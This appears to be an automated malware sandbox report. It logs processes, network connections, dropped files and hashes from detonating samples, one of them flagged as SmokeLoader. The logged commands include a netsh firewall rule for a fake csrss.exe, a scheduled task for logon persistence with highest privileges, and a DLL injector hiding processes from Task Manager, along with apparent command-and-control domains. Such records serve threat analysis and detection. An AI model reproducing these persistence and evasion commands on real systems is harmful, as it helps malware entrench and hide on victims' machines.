C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 708
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 688
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 688
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 620
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 856
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 616
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 736
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 848
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 616
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 732
C:\Users\Admin\AppData\Local\Temp\app.exe
"C:\Users\Admin\AppData\Local\Temp\app.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 340
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 340
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 708
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 668
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 732
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 840
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 1424
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 1440
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 548 -ip 548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 1424
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 664
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 664
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 664
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 664
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 752
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 804
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 780
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 600
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 848
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1268 -ip 1268
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1004
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1512
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1456
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1460
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1488
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1268 -ip 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1580
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | humisnee.com | udp |
| NL | 185.107.56.200:443 | humisnee.com | tcp |
| US | 8.8.8.8:53 | survey-smiles.com | udp |
| US | 199.59.243.227:80 | survey-smiles.com | tcp |
| US | 8.8.8.8:53 | 200.56.107.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | 22763a99-e7a6-4d9f-99b1-4f3fb0cdd6c3.ninhaine.com | udp |
| US | 8.8.8.8:53 | server9.ninhaine.com | udp |
| CZ | 46.8.8.100:443 | server9.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server9.ninhaine.com | tcp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 100.8.8.46.in-addr.arpa | udp |
| CZ | 46.8.8.100:443 | server9.ninhaine.com | tcp |
| US | 8.8.8.8:53 | spolaect.info | udp |
| CZ | 46.8.8.100:443 | server9.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 100.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| CZ | 46.8.8.100:443 | server9.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
Files
memory/2496-1-0x0000000003FE0000-0x0000000004428000-memory.dmp
memory/2496-2-0x0000000004430000-0x0000000004D56000-memory.dmp
memory/2496-3-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2496-5-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2496-6-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2496-7-0x0000000004430000-0x0000000004D56000-memory.dmp
memory/548-8-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/548-9-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/548-10-0x0000000000400000-0x00000000021A3000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | d3f680a40104a2bf44d1e55ab22cc283 |
| SHA1 | 3e44293bd666ee6842f27001e561442203479698 |
| SHA256 | a5d0a8eb93516f6979ce8da08a5750bf7f0f0fc98a969cd9e5b175dd29302a86 |
| SHA512 | 478c308a40b3da9697ef9925e3d8c375bdc9a51d17d401fdf947f1e9ec7b4b5b59d5aa6e5ab0857825f5dbcb398a1cfffe33f972b6841d2916329f2e2358510b |
memory/548-17-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1268-18-0x0000000000400000-0x00000000021A3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/1268-24-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1268-25-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1268-26-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1268-27-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1268-28-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1268-29-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1268-30-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1268-31-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1268-32-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1268-33-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1268-34-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1268-35-0x0000000000400000-0x00000000021A3000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win7-20241010-en
Max time kernel
121s
Max time network
127s
Command Line
Signatures
SmokeLoader
Smokeloader family
Processes
C:\Users\Admin\AppData\Local\Temp\justdezine.exe
"C:\Users\Admin\AppData\Local\Temp\justdezine.exe"
Network
Files
memory/2292-4-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2292-3-0x0000000000220000-0x0000000000229000-memory.dmp
memory/2292-2-0x0000000001F40000-0x0000000002040000-memory.dmp
memory/2292-1-0x0000000000400000-0x0000000001D6E000-memory.dmp